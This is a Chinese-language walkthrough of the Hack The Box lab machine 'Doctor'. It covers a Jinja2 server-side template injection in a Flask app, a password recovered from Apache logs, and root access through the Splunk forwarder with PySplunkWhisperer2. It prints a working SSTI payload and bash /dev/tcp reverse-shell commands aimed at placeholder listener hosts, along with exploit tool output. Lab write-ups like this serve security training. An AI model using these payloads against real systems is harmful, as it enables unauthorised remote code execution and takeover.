Recon

老规矩Nmap开路,Nmap结果如下,全端口扫描结果相同,共开放三个端口。先从80入手。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
# Nmap 7.91 scan initiated Wed Nov 11 18:57:28 2020 as: nmap -sC -sV -oN nmap/initial -v 10.10.10.209
Nmap scan report for 10.10.10.209
Host is up (0.075s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 59:4d:4e:c2:d8:cf:da:9d:a8:c8:d0:fd:99:a8:46:17 (RSA)
|   256 7f:f3:dc:fb:2d:af:cb:ff:99:34:ac:e0:f8:00:1e:47 (ECDSA)
|_  256 53:0e:96:6b:9c:e9:c1:a1:70:51:6c:2d:ce:7b:43:e8 (ED25519)
80/tcp   open  http     Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Doctor
8089/tcp open  ssl/http Splunkd httpd
| http-methods: 
|_  Supported Methods: GET HEAD OPTIONS
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Issuer: commonName=SplunkCommonCA/organizationName=Splunk/stateOrProvinceName=CA/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-09-06T15:57:27
| Not valid after:  2023-09-06T15:57:27
| MD5:   db23 4e5c 546d 8895 0f5f 8f42 5e90 6787
|_SHA-1: 7ec9 1bb7 343f f7f6 bdd7 d015 d720 6f6f 19e2 098b
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Nov 11 18:58:22 2020 -- 1 IP address (1 host up) scanned in 53.65 seconds

FootHold

使用IP访问后,获得邮箱 info@doctors.htb,将域名doctors.htb添加进hosts文件。

使用域名访问返回一个登录页面。

User.txt

该页面开放了注册功能,注册后提示你该账号只有20min的时间。
登录后查看home页面的源码,注释中提示archive页面正在测试。

1
<!--archive still under beta testing<a class="nav-item nav-link" href="/archive">Archive</a>-->

实际访问后为空白页面,wapplyzed插件提示该网站运行在Flask下,语言为python。

LowPrivShell

这一步我卡了很久,涉及到一个全新形式的漏洞,感谢论坛老哥的提示。

我们可以在/post/new页面下留言,留言的内容可以在/archive的源码中看到,结合之前发现的框架和语言,联想到Server Side Template Injection
PayloadsAllTheThins下找到符合条件的payload。

1
2
3
4
# 原始payload
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
# 将其改造为reverse shell
{{config.__class__.__init__.__globals__['os'].popen('bash -c "bash -i >& /dev/tcp/x.x.x.x/port 0>&1 "').read()}}

执行后获得用户web的shell

UserShell

上传linpeas.sh并行后,发现我们在adm用户组内,而这个组拥有阅读/var/log/下所有日志的权限。当然,脚本也告诉我们该目录下有写不同寻常的文件。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
web@doctor:/var/log/apache2$ ls -la
total 93816
drwxr-x---  2 root adm        4096 Nov 11 06:53 .
drwxrwxr-x 13 root syslog     4096 Nov 11 06:53 ..
-rw-r-----  1 root adm    75357811 Nov 11 16:38 access.log
-rw-r-----  1 root adm        6626 Sep 28 15:02 access.log.1
-rw-r-----  1 root adm         323 Aug 21 13:00 access.log.10.gz
-rw-r-----  1 root adm         270 Aug 18 12:48 access.log.11.gz
-rw-r--r--  1 root root    2194472 Jul 27 20:49 access.log.12.gz
-rw-r-----  1 root adm        1493 Sep 23 15:20 access.log.2.gz
-rw-r-----  1 root adm        3951 Sep 22 12:58 access.log.3.gz
-rw-r-----  1 root adm        1341 Sep 19 19:17 access.log.4.gz
-rw-r-----  1 root adm      664054 Sep 15 14:27 access.log.5.gz
-rw-r-----  1 root adm         384 Sep 14 10:07 access.log.6.gz
-rw-r-----  1 root adm        3018 Sep  7 17:24 access.log.7.gz
-rw-r-----  1 root adm        1338 Sep  6 22:46 access.log.8.gz
-rw-r-----  1 root adm        1266 Sep  5 11:58 access.log.9.gz
-rw-r-----  1 root adm       21578 Sep 17 16:23 backup
-rw-r-----  1 root adm    17698860 Nov 11 16:38 error.log
-rw-r-----  1 root adm        3551 Sep 28 15:07 error.log.1
-rw-r-----  1 root adm         476 Sep  7 17:46 error.log.10.gz
-rw-r-----  1 root adm         537 Sep  6 22:47 error.log.11.gz
-rw-r-----  1 root adm         680 Sep  5 11:58 error.log.12.gz
-rw-r-----  1 root adm         341 Sep  5 00:00 error.log.13.gz
-rw-r-----  1 root adm         230 Aug 21 13:07 error.log.14.gz
-rw-r-----  1 root adm        1092 Sep 23 15:42 error.log.2.gz
-rw-r-----  1 root adm         846 Sep 22 13:03 error.log.3.gz
-rw-r-----  1 root adm         655 Sep 22 10:40 error.log.4.gz
-rw-r-----  1 root adm         352 Sep 19 00:00 error.log.5.gz
-rw-r-----  1 root adm         424 Sep 18 00:00 error.log.6.gz
-rw-r-----  1 root adm         428 Sep 17 00:00 error.log.7.gz
-rw-r-----  1 root adm         629 Sep 16 00:00 error.log.8.gz
-rw-r-----  1 root adm         460 Sep 15 00:00 error.log.9.gz
-rw-r--r--  1 root root          0 Jul 27 17:10 other_vhosts_access.log

我们可以看到backup存在。
查看文件后我们可以看到10.10.14.4向reset_password POST了一个密码Guitar123

1
10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password"

我们使用该密码,成功登录用户shaun。并获得user.txt

1
2
3
4
5
6
7
8
web@doctor:/var/log/apache2$ su - shaun
Password: 
shaun@doctor:~$ cd 
shaun@doctor:~$ ls
user.txt
shaun@doctor:~$ wc -c user.txt 
33 user.txt
shaun@doctor:~$

Privilege Escalation

这个时候我们回想起我们没有用过的端口8089,查看后Splunk运行在root用户下。

1
2
3
4
5
6
shaun@doctor:~$ ps -ef | grep splunk
root        1135       1  0 06:53 ?        00:00:55 splunkd -p 8089 start
root        1137    1135  0 06:53 ?        00:00:00 [splunkd pid=1135] splunkd -p 8089 start [process-runner]
root       94939       1  0 13:28 ?        00:00:00 /bin/sh /opt/splunkforwarder/etc/apps/_PWN_APP_/bin/pwn.bat
root       94967       1  0 13:30 ?        00:00:00 /bin/sh /opt/splunkforwarder/etc/apps/_PWN_APP_/bin/pwn.bat
shaun      96375   96262  0 16:46 pts/0    00:00:00 grep --color=auto splunk

找到在Github上有现成的脚本,一把梭。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
/Documents/HTB/Doctor/SplunkWhisperer2/PySplunkWhisperer2 master
❯ python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --port 8089 --username shaun --password Guitar123 --payload "bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1'" --lhost IP
Running in remote mode (Remote Code Execution)
[.] Authenticating...
[+] Authenticated
[.] Creating malicious app bundle...
[+] Created malicious app bundle in: /tmp/tmp76vowwri.tar
[+] Started HTTP server for remote mode
[.] Installing app from: http://10.10.16.7:8181/
10.10.10.209 - - [11/Nov/2020 23:48:13] "GET / HTTP/1.1" 200 -
[+] App installed, your code should be running now!

Press RETURN to cleanup
[.] Removing app...
[+] App removed
[+] Stopped HTTP server
Bye!

获得shell

1
2
3
4
5
6
7
8
9
10
11
12
13
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 10.10.10.209.
Ncat: Connection from 10.10.10.209:52546.
bash: cannot set terminal process group (1137): Inappropriate ioctl for device
bash: no job control in this shell
root@doctor:/# cd root 
cd root
root@doctor:/root# wc -c root.txt
wc -c root.txt
33 root.txt
root@doctor:/root#